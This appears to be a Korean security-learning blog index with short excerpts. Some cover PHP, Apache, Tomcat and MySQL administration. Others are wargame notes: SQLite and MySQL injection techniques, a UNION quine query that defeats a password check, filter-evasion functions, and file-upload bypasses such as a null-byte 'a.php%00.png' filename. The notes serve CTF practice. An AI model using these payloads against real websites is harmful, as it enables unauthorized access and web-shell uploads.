연습 또 연습.

php 레포추가sudo add-apt-repository ppa:ondrej/php 설치 후 엔진이 꺼져있을 때apt-get install libapache2-mod-php 혹은 apt-get install libapache2-mod-php7.0 현재 PHP 7.2을 사용중인데 PHP 5.6으로 디폴트 버전을 변경sudo a2dismod php7.2 ; sudo a2enmod php5.6 ; sudo service apache2 restartsudo update-alternatives --set php /usr/bin/php5.6 현재 PHP 5.6을 사용중인데 PHP 7.2로 디폴트 버전을 변경sudo a2dismod php5.6 ; sudo a2enmod php7.2 ; sudo service apa..

*.jsp/var/lib/tomcat8/webapps/ROOT server.xml, web.xml/etc/tomcat8

페이지 맨 위에

Switch PHP version ( Apache ):from php5.6 to php7.0: sudo a2dismod php5.6 ; sudo a2enmod php7.0 ; sudo service apache2 restartfrom php7.0 to php5.6: sudo a2dismod php7.0 ; sudo a2enmod php5.6 ; sudo service apache2 restart (아직 테스트는 못 해봄..)

rootme-.org에는 SQLite로 된 문제가 종종 있다.(심지어 postgreSQL도 있다.) SQLite에는 information_schema가 없다.그대신 SQLite에는 sqlite_master라는게 있다. 테이블 명과 컬럼 명을 빼낼 때 아래와 같이 하면 된다. # select table_name from information_schema.tables== select name from sqlite_master(또는 select tbl_name from sqlite_master) select sql from sqlite_master결과-> CREATE TABLE users(username TEXT, password TEXT, Year INTEGER)-> 모든 테이블에 대해 수행... etc)주..

1. 계정 추가 mysql> create user userid@localhost identified by '비밀번호'; 계정 삭제mysql> drop user userid@localhost; 2. DB, table에 권한 주기mysql> grant select, insert, update privileges on DB명.테이블 to 아이디@host identified by '비밀번호';mysql> grant all privileges on DB명.테이블 to 아이디@host identified by '비밀번호';

아래와 같이 입력받은 값과 쿼리의 리턴값이 같으면 인증되는 코드가 있다고 하자. if ($_GET['pw'] === $result['pw']) echo " CONG !! "; 아래와 같이 쿼리를 날려주면 리턴값을 입력값과 같게 만들 수 있다. mysql> select pw from prob_1 where id='' and pw=''union select REPLACE(@v:='\'union select REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'));',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''));+------------------------------..

1. 에러메시지 출력 해제php.inidisplay_errors = Off 1. 디렉터리 리스팅 끄기/etc/apache2/conf.d/security또는/etc/apache2/apache2.conf Options FollowSymLinks 디렉터리 리스팅 키려면Options Indexes FollowSymLinks 해당 디렉터리만 하려면 .htaccess에Options Indexes

문자열 우회 ascii(‘a’) = 97 ord(‘a’) = 97‘abc’ = char(97,98,99)'abc' = unhex(616263) hex(‘a’) = 61 substr 우회midlpad(‘abc’,1,space(1)) = ‘a’ rpad(‘abc’,1,space(1)) = ‘a’ left(‘abc’,1) = ‘a’ 문자열 검색locate(‘a’,’abc’) position(‘a’,’abc’) position(‘a’ IN ‘abc’) instr(‘abc’,’a’) 각종 필터링 걸려있을 땐 정규식 이용where id regexp "admin" admin이 필터링 되어있으면where id regexp concat("admi", "n") 정규식에서 "^admin"은 "admin"으로 시작"adadm..

1. “test.php “와 같이 확장자 명 뒤에 공백 2. 파일 확장자를 php5와 같이 변경 3. 파일 이름 뒤에 % 붙여서 전송 (프록시로) 4. 널 바이트 이용. (root-me.org - File upload)[파일 업로드시 png파일 밖에 안 올라간다.]Content-Type을 아래와 같이 주고파일명을 .png로 인식하게 하고 업로드 성공시킨다.업로드한 파일 실행시에는 php파일이 되어야 하므로, %00로 .png를 날린다. Content-Disposition: form-data; name="file"; filename="a.php%00.png"Content-Type: image/png